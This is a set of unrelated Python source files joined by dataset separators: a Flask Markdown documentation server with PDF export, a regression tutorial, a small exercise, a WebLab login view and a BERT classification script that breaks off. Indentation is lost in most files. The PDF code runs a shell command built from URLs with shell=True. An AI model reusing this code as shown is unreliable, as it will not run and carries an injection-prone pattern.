file_path = os.path.abspath(os.path.join(root_dir, page))
if not os.path.isfile(file_path):
abort(404)
if '.md' not in [ext.lower() for ext in os.path.splitext(file_path)]:
return send_from_directory(os.path.dirname(file_path), os.path.basename(file_path))
# Configure the different paths.
pdf_temp = f'{tempfile.mktemp()}.pdf'
input_url = url_for('wiki', page=page, _external=True)
header_url = url_for('print_header', _external=True)
footer_url = url_for('print_footer', _external=True)
args = f'{WKHTMLTOPDF_BINARY} --header-html {header_url} --footer-html {footer_url} \
--print-media-type --header-spacing 2 {input_url} {pdf_temp}'
# Invoke WkHTMLtoPDF
result = subprocess.check_output(args, shell=True)
if not result:
pass
# Write the newly generated temp pdf into a response.
with open(pdf_temp, 'rb') as f:
binary_pdf = f.read()
target_file_name = page.replace("/", "_").replace("\\", "_")
response = make_response(binary_pdf)
response.headers['Content-Type'] = 'application/pdf'
# response.headers['Content-Disposition'] = f'attachment; filename={target_file_name}.pdf'
response.headers['Content-Disposition'] = f'inline; filename={target_file_name}.pdf'
# Delete the temp file and return the response.
os.remove(pdf_temp)
return response
def generate_static_pdf(app, root_dir, output_dir, nav_filter=None):
""" Generate a static PDF directory for the documentation in `root_dir`
into `output_dir`.
"""
global PORT_NUMBER
# Find all markdown document paths that are in the nav.
documents = build_meta_cache(root_dir)
markdown_docs_urls = ['pdf/' + file.replace('\\', '/') for file in documents.keys()]
# Generate URl to file pairs.
pairs = [(f'http://localhost:{PORT_NUMBER}/{url}',
f'{os.path.join(output_dir, *os.path.split(url))}.pdf')
for url in markdown_docs_urls]
# Download each pair.
for source, target in pairs:
os.makedirs(os.path.dirname(target), exist_ok=True)
print(f'Source: {source} \n Target: {target}')
urllib.request.urlretrieve(source, target)
# Helper function to return the domain if present.
def is_absolute(url):
""" Returns True if the passed url string is an absolute path.
False if not
"""
links = urlparse(url)
return bool(links.netloc)
def generate_static_html(app, root_dir, output_dir):
""" Generate a static HTML site for the documentation in `root_dir`
into `output_dir`.
"""
from flask_frozen import Freezer, MissingURLGeneratorWarning
import warnings
warnings.filterwarnings("ignore", category=MissingURLGeneratorWarning)
# Update the flask config.
app.config['FREEZER_RELATIVE_URLS'] = True
app.config['FREEZER_IGNORE_MIMETYPE_WARNINGS'] = True
app.config['FREEZER_DESTINATION'] = output_dir
# Create the freezer app. Make it use specific URLs.
freezer = Freezer(app, with_no_argument_rules=False, log_url_for=False)
# Register a generator that passes ALL files in the docs directory into the
# `wiki` flask route.
@freezer.register_generator
def wiki():
all_docs = [file.replace(f'{root_dir}', '/w').replace(f'{os.path.sep}', '/')
for file in glob.iglob(f'{root_dir}/**/*', recursive=True)
if os.path.isfile(file)]
for doc in all_docs:
yield doc
# Save all the URLs using the correct extension and MIME type.
freezer.freeze()
# For each `.md` file in the output directory:
for markdown_file in glob.iglob(f'{output_dir}/**/*.md', recursive=True):
# Rewrite all relative links to other `.md` files to `.html.`
output = ''
with open(markdown_file, 'r', encoding="utf-8") as f:
html = f.read()
def _href_replace(m):
href = m.group()
if is_absolute(href[6:-1]):
return href
return href.replace('.md', '.html')
output = re.sub('href="(.*md)"', _href_replace, html)
# Rename the file from `.md` to HTML.
with open(markdown_file[:-3] + '.html', 'w', encoding="utf-8") as f:
f.write(output)
# Delete the Markdown file.
os.remove(markdown_file)
def load_project_logo(logo_file=None):
""" Attempt to load the project logo from the specified path.
If this fails, return None. If this succeeds, convert it to a data-uri.
"""
if not logo_file:
return None
if not os.path.exists(logo_file):
return None
with open(logo_file, 'rb') as fp:
mime = 'image/png'
data64 = base64.b64encode(fp.read()).decode('utf-8')
preview_uri = u'data:%s;base64,%s' % (mime, data64)
return preview_uri
def check_pdf_generation_cap():
""" Check to see if we can use PDF generation by attempting to use the binary. """
global WKHTMLTOPDF_BINARY
retcode = subprocess.call(f'{WKHTMLTOPDF_BINARY} --version',
shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
return retcode == 0
def copy_local_project(force=False):
""" Copy the sample docs and style into the local working directory.
Note: This will overwrite anything currently in those folders.
"""
source_root = os.path.dirname(__file__)
target_root = os.getcwd()
targets = ['docs', 'style', 'logo.png']
pairs = [(os.path.join(source_root, path), os.path.join(target_root, path))
for path in targets]
for source, target in pairs:
if os.path.isdir(source):
if os.path.exists(target):
if force:
                    print(f'Deleting existing {target} and replacing it with {source}')
shutil.rmtree(target)
shutil.copytree(source, target)
else:
print(f'Warning: {target} already exists.')
else:
print(f'Copying: {source} -> {target}')
shutil.copytree(source, target)
else:
if os.path.exists(target):
if force:
                    print(f'Deleting existing {target} and replacing it with {source}')
os.remove(target)
shutil.copyfile(source, target)
else:
print(f'Warning: {target} already exists.')
else:
print(f'Copying: {source} -> {target}')
shutil.copyfile(source, target)
def find_references(document_path):
""" Search through the markdown 'document_path' and make a list of referenced files
with paths that are relative to the directory containing the `document_path`.
"""
# Open the file to search.
with open(document_path, 'r', encoding='utf-8') as f:
markdown_raw_data = f.read()
# Render as HTML.
md = markdown.Markdown(extensions=mdextensions)
document_dir = os.path.dirname(document_path)
md.page_root = document_dir
# Interpret with the BeautifulSoup HTML scraping library.
soup = BeautifulSoup(md.convert(markdown_raw_data), 'html.parser')
tags_to_search = {
'img': 'src',
'a': 'href',
'video': 'src',
'table': 'source',
'embed': 'src',
}
# For each entry in the `tags_to_search` table, extract the tag attribute value.
references = set()
for k, v in tags_to_search.items():
for tag in soup.find_all(k):
val = tag.get(v)
if val:
references.add(val)
# Normalise the referenced assets (to take into account relative paths).
references = [os.path.join(document_dir, urllib.request.url2pathname(ref)) for ref in references]
# Make unique.
return set(references)
def has_nav(markdown_text):
""" Returns True if the passed string of text contains navbar metadata.
Returns False if it does not.
"""
expression = re.compile(r'(?=\n|)nav:\s+\w+(?=\n |)')
return True if expression.search(markdown_text) else False
def find_orphans(files):
""" Searches all files and folders recursively in the given path for image and video assets
that are unused by markdown files.
"""
    # Find all references in each markdown file.
pages = {}
for file in files:
if file.endswith('.md'):
pages[file] = find_references(file)
# Remove the markdown documents that have a navbar metadata.
md_with_nav = []
for file in files:
if file.endswith('.md'):
with open(file, encoding='utf-8') as f:
if has_nav(f.read().lower()):
md_with_nav.append(file)
files = [x for x in files if x not in md_with_nav]
# Create a flat list of all references in the markdown files
all_references = []
for i in pages.values():
all_references += [k for k in i]
# Output unused assets
return [i for i in files if i not in all_references]
class DocumentLinks:
""" A helper class to process the `<a href.../>` links from a single
markdown document that is rendered using our own renderer.
"""
def __init__(self, md_file):
""" Open a Markdown document and find all links in `<a href .../>`.
"""
# Store important information about this document.
self.md_file = md_file
self.md_dir = os.path.dirname(md_file)
# Read in Markdown and generate HTML with our parser.
with open(md_file, 'r', encoding='utf-8') as f:
markdown_raw_data = f.read()
md = markdown.Markdown(extensions=mdextensions)
md.page_root = self.md_dir
html = md.convert(markdown_raw_data)
# Interpret with the BeautifulSoup HTML scraping library.
soup = BeautifulSoup(html, 'html.parser')
tags_to_search = {
'img': 'src',
'a': 'href',
'video': 'src',
'table': 'source',
'embed': 'src',
}
self.references = set()
for k, v in tags_to_search.items():
links = soup.find_all(k)
for link in links:
if link.get('href'):
if link.get('href').find('http:') > -1 or link.get('href').find('https:') > -1:
val = link.get(v)
if val:
self.references.add(val)
else:
val = link.get(v)
if val:
self.references.add(val)
@property
def web_links(self):
""" Generate a list of web links from our cached links.
"""
return [link for link in self.references if is_absolute(link)]
@property
def relative_links(self):
""" Generate a list of relative file system links from our cached links.
This converts from a web path to a path on disk then normalises the path to the current directory.
"""
def _norm(path):
return os.path.join(self.md_dir, urllib.request.url2pathname(path))
return [_norm(link) for link in self.references if not is_absolute(link)]
@staticmethod
def validate_url(address):
""" Returns `True` if page at address returns with status code 200 (ok) otherwise returns `False`.
"""
try:
request = requests.head(address)
return request.status_code, address
except requests.exceptions.RequestException:
return False, address
def detect_broken_links(self, process_pool):
""" Go through all the `web_links` and the `relative_links` and report
which are broken (i.e. do not resolve to HTTP200OK or a file on disk).
"""
result = process_pool.map(self.validate_url, self.web_links)
for response, url in result:
if not response == 200:
                yield url + ' Status: ' + (responses[response] if response in responses else "Exception")  # reason phrase, or "Exception" when the HEAD request failed
for file in self.relative_links:
if not os.path.exists(file):
yield file
def generate_metadata(path):
""" Add relevant metadata to the top of the markdown file at the passed path.
Title is drawn from the filename, Date from the last modified timestamp, Version defaults at 1.0.0,
Nav is generated from the filepath, and Authors are generated from the git contributors (if applicable) and
are otherwise left blank.
Warning: Does not check if there is existing metadata.
"""
s = subprocess.getoutput(f"git log -p {path}")
lines = s.split(os.linesep)
authors = set([re.search(r'<(.*)>', line).group(1)for line in lines if 'Author:' in line])
file_status = os.stat(path)
nav_path = os.path.sep.join(path.split(os.path.sep)[1:])
metadata = {
'title': ' '.join(
path
.split('.')[0]
.split(os.path.sep)[-1]
.replace('_', ' ')
.replace('-', ' ')
.title()
.split()
),
'desc': '',
'date': datetime.datetime.utcfromtimestamp(file_status.st_mtime).strftime('%Y/%m/%d'),
'version': '1.0.0',
'template': '',
'nav': nav_path.replace(os.path.sep, '>').title().split('.')[0],
'percent': '100',
'authors': ' '.join(authors),
}
result = ""
for key in metadata.keys():
result += ('{}:{}{}\n'.format(key, '\t' if len(key) > 6 else '\t\t', metadata[key]))
with open(path, 'r+', encoding='utf-8') as f:
content = f.read()
f.seek(0, 0)
f.write(result)
f.write(content)
class ReloadHandler(PatternMatchingEventHandler):
""" Rebuild the document metadata / navigation cache when markdown files are updated
in the documents directory. """
def __init__(self, app):
super(ReloadHandler, self).__init__(patterns=['*.md'], ignore_directories=False, case_sensitive=False)
self.flask_app = app
def on_any_event(self, event):
self.flask_app.build_navigation_cache()
global CMD_ARGS, NAV_MENU, PROJECT_LOGO, WKHTMLTOPDF_BINARY, PDF_GENERATION_ENABLED, PORT_NUMBER
CMD_ARGS = None
NAV_MENU = {}
PROJECT_LOGO = None
WKHTMLTOPDF_BINARY = None
PDF_GENERATION_ENABLED = False
def main():
""" Application entrypoint. """
global PORT_NUMBER
PORT_NUMBER = 5000
# Parse the command line arguments.
parser = argparse.ArgumentParser(description='docnado: Lightweight tool for rendering \
Markdown documentation with different templates.')
parser.add_argument('--html', action='store', dest='html_output_dir',
help='Generate a static site from the server and output to the \
specified directory.')
parser.add_argument('--pdf', action='store', dest='pdf_output_dir',
help='Generate static PDFs from the server and output to the \
specified directory.')
parser.add_argument('--nav-limit', action='store', dest='nav_limit',
default=None,
help='Include certain document trees only based on a comma separated \
list of nav strings. e.g. Tooling,Document')
parser.add_argument('--new', action="store_true", dest='new_project',
default=False,
help='Copy the `docs` and `styles` folder into the working directory \
and output a config file that addresses them. Does not overwrite existing files.')
parser.add_argument('--new-force', action="store_true", dest='new_project_force',
default=False,
help='Copy the `docs` and `styles` folder into the working directory \
and output a config file that addresses them. Force deletion of existing files.')
parser.add_argument('--dirs', action="store_true", dest='show_dirs',
default=False,
help='Display the different directories the software is using \
to search for documentation and styles.')
parser.add_argument('--generate-meta', action="store", dest='generate_meta',
default=False,
help='Generate metadata for markdown files in the specified directory.')
parser.add_argument('--find-orphans', action="store_true", dest='find_orphans',
default=False,
help='Identify unused media assets (orphans)')
parser.add_argument('--find-broken-links', action="store_true", dest='find_broken_links',
default=False,
help='Identify broken external links.')
parser.add_argument('--port', action="store", dest='new_port_number',
default=False,
help='Specify a port for the docnado server')
parser.add_argument('--host', action="store", dest='set_host',
default=False,
help='Set the docnado development server to listen on IP addresses.')
# Import the command line args and make them application global.
global CMD_ARGS
args = parser.parse_args()
CMD_ARGS = args
# Load config from the environment and validate it.
global PROJECT_LOGO, PDF_GENERATION_ENABLED, NAV_MENU, WKHTMLTOPDF_BINARY
TRUE = 'TRUE'
FALSE = 'FALSE'
flask_debug = os.environ.get('DN_FLASK_DEBUG', FALSE) == TRUE
watch_changes = os.environ.get('DN_RELOAD_ON_CHANGES', TRUE) == TRUE
WKHTMLTOPDF_BINARY = ('wkhtmltopdf_0.12.5.exe' if platform.system() == 'Windows' else 'wkhtmltopdf')
PDF_GENERATION_ENABLED = check_pdf_generation_cap()
dir_documents = os.environ.get('DN_DOCS_DIR', os.path.join(os.getcwd(), 'docs'))
dir_style = os.environ.get('DN_STYLE_DIR', os.path.join(os.getcwd(), 'style'))
logo_location = os.environ.get('DN_PROJECT_LOGO', os.path.join(os.getcwd(), 'logo.png'))
# If `style` folder does not exist, use the one in site-packages.
if not os.path.exists(dir_style) and not os.path.isdir(dir_style):
dir_style = os.path.join(os.path.dirname(__file__), 'style')
# Attempt to load the project logo into a base64 data uri.
PROJECT_LOGO = load_project_logo(logo_location)
# Compute the static and template directories.
dir_static = os.path.join(dir_style, 'static')
dir_templates = os.path.join(dir_style, 'templates')
# If the user is asking to create a new project.
if args.new_project:
copy_local_project()
sys.exit()
if args.new_project_force:
copy_local_project(force=True)
return 0
if args.new_port_number:
PORT_NUMBER = int(args.new_port_number)
if args.generate_meta:
doc_files = glob.iglob(args.generate_meta + '/**/*.md', recursive=True)
for i in doc_files:
generate_metadata(i)
return 0
if args.find_orphans:
# Find all the assets in the directory/subdirectories recursively and append their file path to a list.
files = glob.glob((dir_documents + '/**/*.*'), recursive=True)
files = [f for f in files if not os.path.isdir(f)]
orphans = find_orphans(files)
if orphans:
print(f'{len(orphans)} Unused assets (orphans):\n\t' + '\n\t'.join(orphans))
return -1
return 0
if args.find_broken_links:
process_pool = Pool(processes=10)
md_files = glob.glob((dir_documents + '/**/*.md'), recursive=True)
md_reports = tuple((md, list(DocumentLinks(md).detect_broken_links(process_pool))) for md in md_files)
num_broken = 0
for file, report in md_reports:
if report:
num_broken += len(report)
print(f'{file}\n\t' + '\n\t'.join(report))
return -1 if num_broken else 0
if args.show_dirs:
print('The following directories are being used: ')
print('\t', f'Documents -> {dir_documents}')
print('\t', f'Logo -> {logo_location}')
print('\t', f'Style -> {dir_style}')
print('\t', f' Static -> {dir_static}')
print('\t', f' Templates -> {dir_templates}')
sys.exit()
if not os.path.exists(dir_documents) and not os.path.isdir(dir_documents):
print(f'Error: Documents directory "{dir_documents}" does not exist. \
Create one called `docs` and fill it with your documentation.', file=sys.stderr)
sys.exit(-1)
if not os.path.exists(dir_static) and not os.path.isdir(dir_static):
print(f'Error: Static directory "{dir_static}" does not exist.', file=sys.stderr)
sys.exit(-1)
if not os.path.exists(dir_templates) and not os.path.isdir(dir_templates):
print(f'Error: Templates directory "{dir_templates}" does not exist.', file=sys.stderr)
sys.exit(-1)
# Create the server.
app = Flask(__name__,
static_url_path='',
template_folder=dir_templates,
static_folder=dir_static)
# Attach routes and filters.
configure_flask(app, dir_documents)
# Output PDF files.
if args.pdf_output_dir:
if not check_pdf_generation_cap():
print(f'Error: PDF generation requires WkHTMLtoPDF.', file=sys.stderr)
sys.exit(-1)
def gen_pdfs():
time.sleep(2)
generate_static_pdf(
app, dir_documents, os.path.join(os.getcwd(), args.pdf_output_dir)
)
time.sleep(5)
os.kill(os.getpid(), signal.SIGTERM)
t1 = threading.Thread(target=gen_pdfs)
t1.start()
app.run(debug=flask_debug, threaded=True, port=PORT_NUMBER)
sys.exit()
# Output a static site.
if args.html_output_dir:
PDF_GENERATION_ENABLED = False
try:
generate_static_html(app, dir_documents, os.path.join(os.getcwd(), args.html_output_dir))
index_html = """ <!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="0; url=./w/">
</head>
<body>
</body>
</html>"""
with open(os.path.join(os.getcwd(), args.html_output_dir, 'index.html'), 'w') as f:
f.write(index_html)
except Exception:
traceback.print_exc(file=sys.stderr)
sys.exit(-1)
sys.exit()
# Watch for any changes in the docs or style directories.
dn_watch_files = []
observer = None
if watch_changes:
observer = Observer()
observer.schedule(ReloadHandler(app), path=dir_documents, recursive=True)
observer.start()
dn_watch_files = build_reload_files_list([__name__, dir_style])
# Run the server.
if args.set_host:
try:
            print('Attempting to set the development server to listen on public IP address: ' + args.set_host)
print('WARNING: The Docnado development environment is intended to be used as a development tool ONLY, '
'and is not recommended for use in a production environment.')
app.run(debug=flask_debug, port=PORT_NUMBER, extra_files=dn_watch_files, host=args.set_host)
except OSError as e:
print(e)
print(f'Error initialising server.')
except KeyboardInterrupt:
pass
finally:
if observer:
observer.stop()
observer.join()
else:
try:
app.run(debug=flask_debug, port=PORT_NUMBER, extra_files=dn_watch_files)
except OSError as e:
print(e)
print(f'Error initialising server.')
except KeyboardInterrupt:
pass
finally:
if observer:
observer.stop()
observer.join()
# if running brainerd directly, boot the app
if __name__ == "__main__":
main()
| StarcoderdataPython |
85070 | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 16 09:57:44 2017
@author: hao
"""
import numpy as np
import matplotlib.pyplot as plt
# In[]
# 4.1.1 The Normal Equation
X = 2 * np.random.rand(100, 1) # generate a 100*1 array
y = 4 + 3 * X + np.random.randn(100, 1)
X_b = np.c_[np.ones((100, 1)), X] # add x0 = 1 to each instance
theta_best = np.linalg.inv(X_b.T.dot(X_b)).dot(X_b.T).dot(y)
theta_best
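# In[]
# Editorial sketch (not in the original script): the same least-squares solution can be
# obtained with NumPy's pinv/lstsq, which avoid explicitly inverting X_b.T.dot(X_b) and are
# numerically more stable. The names theta_pinv / theta_lstsq are illustrative.
theta_pinv = np.linalg.pinv(X_b).dot(y)
theta_lstsq, residuals, rank, singular_values = np.linalg.lstsq(X_b, y, rcond=None)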
# In[]
X_new = np.array([[0], [2]])
X_new_b = np.c_[np.ones((2, 1)), X_new] # add x0 = 1 to each instance
y_predict = X_new_b.dot(theta_best)
plt.plot(X_new, y_predict, "r-")
plt.plot(X, y, "b.")
plt.axis([0, 2, 0, 15])
plt.show()
# In[] The equivalent code using Scikit-Learn
from sklearn.linear_model import LinearRegression
lin_reg = LinearRegression()
lin_reg.fit(X, y)
lin_reg.intercept_, lin_reg.coef_
lin_reg.predict(X_new)
# In[]
# 4.2.1 Batch Gradient Descent
eta = 0.1 # learning rate
n_iterations = 1000
m = 100
theta = np.random.randn(2,1) # random initialization
for iteration in range(n_iterations):
gradients = 2/m * X_b.T.dot(X_b.dot(theta) - y)
theta = theta - eta * gradients
theta
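# The loop above performs full-batch gradient descent on the MSE cost:
# gradients = (2/m) * X_b.T.dot(X_b.dot(theta) - y), followed by theta <- theta - eta * gradients.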
# In[]
# 4.2.2 Stochastic Gradient Descent
n_epochs = 50
t0, t1 = 5, 50 # learning schedule hyperparameters
def learning_schedule(t):
return t0 / (t + t1)
theta = np.random.randn(2,1) # random initialization
for epoch in range(n_epochs):
for i in range(m):
random_index = np.random.randint(m)
xi = X_b[random_index:random_index+1]
yi = y[random_index:random_index+1]
gradients = 2 * xi.T.dot(xi.dot(theta) - yi)
eta = learning_schedule(epoch * m + i)
theta = theta - eta * gradients
theta
# In[]
# perform Linear Regression using SGD with Scikit-Learn
from sklearn.linear_model import SGDRegressor
sgd_reg = SGDRegressor(n_iter=50, penalty=None, eta0=0.1)
sgd_reg.fit(X, y.ravel())
sgd_reg.intercept_, sgd_reg.coef_
# In[]
# 4.3 Polynomial Regression
m = 100
X = 6 * np.random.rand(m, 1) - 3
y = 0.5 * X**2 + X + 2 + np.random.randn(m, 1)
plt.plot(X, y, "b.")
from sklearn.preprocessing import PolynomialFeatures
poly_features = PolynomialFeatures(degree=2, include_bias=False)
X_poly = poly_features.fit_transform(X)
lin_reg = LinearRegression()
lin_reg.fit(X_poly, y)
lin_reg.intercept_, lin_reg.coef_
X_test = np.arange(-3,4, 0.5)
y_predict = lin_reg.coef_[0,1]*X_test**2 + lin_reg.coef_[0,0]*X_test + lin_reg.intercept_[0]
plt.plot(X_test, y_predict, "r-")
plt.axis([-3, 3, 0, 10])
plt.show()
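# In[]
# Editorial sketch (not in the original script): the manual prediction formula above can also
# be written with the fitted objects themselves, avoiding hard-coded coefficient indices.
# The name y_predict_alt is illustrative.
y_predict_alt = lin_reg.predict(poly_features.transform(X_test.reshape(-1, 1)))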
# In[]
# 4.3.1 Learning Curves
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split
def plot_learning_curves(model, X, y):
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.2)
train_errors, val_errors = [], []
for m in range(1, len(X_train)):
model.fit(X_train[:m], y_train[:m])
y_train_predict = model.predict(X_train[:m])
y_val_predict = model.predict(X_val)
train_errors.append(mean_squared_error(y_train_predict, y_train[:m]))
val_errors.append(mean_squared_error(y_val_predict, y_val))
plt.plot(np.sqrt(train_errors), "r-+", linewidth=2, label="train")
plt.plot(np.sqrt(val_errors), "b-", linewidth=3, label="val")
# In[]
from sklearn.pipeline import Pipeline
polynomial_regression = Pipeline((
("poly_features", PolynomialFeatures(degree=10, include_bias=False)),
("sgd_reg", LinearRegression()),
))
plot_learning_curves(polynomial_regression, X, y)
# In[]
# 4.4.1 Ridge Regression
from sklearn.linear_model import Ridge
ridge_reg = Ridge(alpha=1, solver="cholesky")
ridge_reg.fit(X, y)
ridge_reg.predict([[1.5]])
sgd_reg = SGDRegressor(penalty="l2")
sgd_reg.fit(X, y.ravel())
sgd_reg.predict([[1.5]])
# In[]
# 4.4.2 Lasso Regression
from sklearn.linear_model import Lasso
lasso_reg = Lasso(alpha=0.1)
lasso_reg.fit(X, y)
lasso_reg.predict([[1.5]])
# In[]
# 4.4.3 Elastic Net
from sklearn.linear_model import ElasticNet
elastic_net = ElasticNet(alpha=0.1, l1_ratio=0.5)
elastic_net.fit(X, y)
elastic_net.predict([[1.5]])
# In[]
# 4.5.3 Decision Boundaries
from sklearn import datasets
iris = datasets.load_iris()
list(iris.keys())
X = iris["data"][:, 3:] # petal width
y = (iris["target"] == 2).astype(np.int) # 1 if Iris-Virginica, else 0
# In[]
from sklearn.linear_model import LogisticRegression
log_reg = LogisticRegression()
log_reg.fit(X, y)
# In[]
X_new = np.linspace(0, 3, 1000).reshape(-1, 1)
y_proba = log_reg.predict_proba(X_new)
plt.plot(X_new, y_proba[:, 1], "g-", label="Iris-Virginica")
plt.plot(X_new, y_proba[:, 0], "b--", label="Not Iris-Virginica")
# In[]
# 4.5.4 Softmax Regression
X = iris["data"][:, (2, 3)] # petal length, petal width
y = iris["target"]
softmax_reg = LogisticRegression(multi_class="multinomial",solver="lbfgs", C=10)
softmax_reg.fit(X, y)
softmax_reg.predict([[5, 2]])
softmax_reg.predict_proba([[5, 2]]) | StarcoderdataPython |
1633461 | #!/bin/python3
import sys
def to_arr(num):
arr = []
while num != 0:
arr.append(num % 10)
num = int(num / 10)
arr.reverse()
return arr
t = int(input().strip())
for a0 in range(t):
n = int(input().strip())
arr = to_arr(n)
num_div = 0
for i in range(0, len(arr)):
if (arr[i] != 0) and (n % arr[i] == 0):
num_div += 1
print(num_div)
| StarcoderdataPython |
3249601 | <filename>server/src/weblab/core/webclient/web/view_index.py
import traceback
from flask import render_template, request, flash, redirect, url_for, make_response
from weblab.core.login.exc import InvalidCredentialsError
from weblab.core.webclient.web.helpers import safe_redirect
from weblab.core.wl import weblab_api
from weblab.core.exc import SessionNotFoundError
@weblab_api.route_webclient("/", methods=["GET", "POST"])
def index():
"""
Handles the index screen displaying (GET) and login (POST).
"""
# THIS POST WILL ONLY BE INVOKED IF JAVASCRIPT IS DISABLED.
# Otherwise logging is handled from JS.
if request.method == "POST":
return handle_login_POST()
return handle_login_GET()
def handle_login_POST():
"""
Carries out an actual log in.
:return:
"""
# If this is a POST it is a login request.
#
username = request.values.get("username")
password = request.values.get("password")
guestlogin = request.values.get("guestlogin")
# If we have a guestlogin then it is a DEMO login request.
if guestlogin is not None:
username = "demo"
password = "<PASSWORD>"
# We may or may not have a 'next' field. If we do, we make sure that the URL is safe.
next = request.values.get("next")
next = safe_redirect(next)
try:
session_id = weblab_api.api.login(username, password)
except InvalidCredentialsError:
flash("Invalid username or password", category="error")
# _scheme is a workaround. See comment in other redirect.
return redirect(url_for(".index", _external=True, _scheme=request.scheme))
except:
traceback.print_exc()
flash("There was an unexpected error while logging in.", 500)
return make_response("There was an unexpected error while logging in.", 500)
else:
# TODO: Find proper way to do this.
# This currently redirects to HTTP even if being called from HTTPS. Tried _external as a workaround but didn't work.
# More info: https://github.com/mitsuhiko/flask/issues/773
# For now we force the scheme from the request.
response = make_response(redirect(next or url_for(".labs", _external=True, _scheme=request.scheme)))
""" @type: flask.Response """
session_id_cookie = '%s.%s' % (session_id.id, weblab_api.ctx.route)
# Inserts the weblabsessionid and loginsessionid cookies into the response.
# (What is the purpose of having both? Why the different expire dates?)
weblab_api.fill_session_cookie(response, session_id_cookie)
print "LOGGED IN WITH: (%s)" % (session_id_cookie)
return response
def handle_login_GET():
"""
Displays the index (the login page).
"""
return render_template("webclient_web/index.html")
@weblab_api.route_webclient("/logout", methods=["GET", "POST"])
def logout():
"""
Logout will logout the current session and redirect to the main page.
"""
try:
# TODO: Take into account the somewhat unclear difference between the loginweblabsessionid and the other one.
cookie = request.cookies.get("weblabsessionid", None)
if cookie is not None:
# Prepare to call the weblab_api
weblab_api.ctx.reservation_id = cookie
weblab_api.api.logout()
except SessionNotFoundError as ex:
# We weren't logged in but it doesn't matter because we want to logout anyway.
pass
return redirect(url_for(".index", _external=True, _scheme=request.scheme))
| StarcoderdataPython |
3214169 | # SETUP
#
# Refs
# https://github.com/UKPLab/sentence-transformers
# https://towardsdatascience.com/nlp-extract-contextualized-word-embeddings-from-bert-keras-tf-67ef29f60a7b
# https://towardsdatascience.com/bert-for-dummies-step-by-step-tutorial-fb90890ffe03
# Standard includes
import csv
import pickle
import pandas as pd
import string
from tkinter import Tk, filedialog
# import nltk
# nltk.download('stopwords')
# nltk.download('wordnet')
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from pandas import DataFrame
from sklearn import svm
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.model_selection import GridSearchCV
import numpy as np
from sklearn.metrics import average_precision_score
from sklearn.metrics import plot_precision_recall_curve
import matplotlib.pyplot as plt
import seaborn as sn
from sentence_transformers import SentenceTransformer
from sklearn.metrics import precision_recall_fscore_support, classification_report
# Select File
root = Tk()
root.filename = filedialog.askopenfilename()
file = root.filename
root.withdraw()
# (NLTK) Helper Settings
stop = set(stopwords.words('english'))
exclude = set(string.punctuation)
lemma = WordNetLemmatizer()
# (NLTK) Helper Functions
def clean(doc):
stop_free = " ".join([i for i in doc.split() if i not in stop])
punc_free = ''.join(ch for ch in stop_free if ch not in exclude)
normalized = " ".join(lemma.lemmatize(word) for word in punc_free.split())
return normalized
# Settings & Variables
# TODO: Populate key_dict dynamically based on what the Label is...
#key_dict = {0: 'Social Relationships', 1: 'Health, Fatigue, or Physical Pain', 2: 'Emotional Turmoil', 3: 'Work',
# 4: 'Family Issues', 5: 'Everday Decision Making', 6: 'School', 7: 'Other', 8: 'Financial Problem'}
#key_dict = {1: '1', 2: '2', 3: '3', 4: '4', 5: '5', 6: '6', 7: '7', 8: '8', 9: '9', 10: '10'}
Input_File = file
print(Input_File)
output_model_filename = 'finalized_model.sav'
output_probs = "output_probs.csv"
Label = "Multi-class"
Features = "BERT"
Algorithm = "SVC"
Sweep = False
# ----------------------------------------
# SCRIPT PROCESSING
# This is where the main processing takes place
# Read data from converted/compiled CSV (Assumes data is sorted by 'Set' column ascending)
# TODO: See how the TF_IDF features parse the list and use that here instead of relying on the ordering of 'Set'
df = pd.read_csv(Input_File)
TargetNamesStrings = [str(x) for x in df[Label].unique().tolist()]
TargetNames = df[Label].unique().tolist()
TargetNames.sort()
# Fallback for the TODO above: build key_dict from the observed labels so the reporting
# code below does not raise a NameError when no hand-written mapping is uncommented.
key_dict = {label: str(label) for label in TargetNames}
dataset = (df['Set'] == 0).sum()
class_report = open('scikit_report.txt', 'w')
class_report.write(str(Input_File) + '\n')
# Preview the first 5 lines of the loaded data
print(df.head())
class_report.write(str(df.head()))
class_report.write('\n')
# Cast labels
df[Label] = df[Label].astype(int)
# Read each document and clean it.
df["Sentence"] = df["Sentence"].apply(clean)
# Let's do some quick counts
# TODO: Make this dynamic so we don't have to interact with the code here to change # of labels above
CategoryLabels = list(df[Label])
label_sum = float(len(CategoryLabels))
print(" ")
class_report.write(" \n")
print("===============")
class_report.write("===============\n")
print("Data Distribution:")
class_report.write("Data Distribution:\n")
for label in TargetNames:
print(str(label) + ' ' + str(key_dict[label]) + ' contains:', CategoryLabels.count(label), round(float(CategoryLabels.count(label) / label_sum), 2))
class_report.write(str(label) + ' ' + str(key_dict[label]) + ' contains:' + ' ' + str(CategoryLabels.count(label)) + ' ' + str(round(float(CategoryLabels.count(label) / label_sum), 2)))
class_report.write('\n')
# Beginning to calculate features, including BERT and TF-IDF; this process can be a bit of a bottleneck
# TODO: Consider writing these variables to a file to "pre-compute" them if experiments are taking a while
print(" ")
class_report.write(" \n")
print("===============")
class_report.write("===============\n")
print("Fitting Features: ")
class_report.write("Fitting Features: \n")
print(" ")
class_report.write('\n')
bert_dimension = 0
if Features == "All" or Features == "BERT":
# Create BERT Features and add to data frame
print('Fitting BERT Features')
class_report.write('Fitting BERT Features')
model = SentenceTransformer('bert-base-nli-mean-tokens')
sentences = df['Sentence'].tolist()
sentence_embeddings = model.encode(sentences)
encoded_values = pd.DataFrame(np.row_stack(sentence_embeddings))
FeatureNames = []
bert_dimension = encoded_values.shape[1]
for x in range(0, bert_dimension):
FeatureNames.append("BERT_" + str(x))
training_corpus = encoded_values.head(dataset)
test_corpus = encoded_values.tail((df['Set'] == 1).sum())
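    # Note (added): 'bert-base-nli-mean-tokens' yields 768-dimensional sentence embeddings,
    # so bert_dimension is typically 768 (one FeatureNames entry per embedding dimension).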
tf_dimension = 0
if Features == "All" or Features == "TF":
# Create TF-IDF Features and add to data frame
print('Fitting TF-IDF Features')
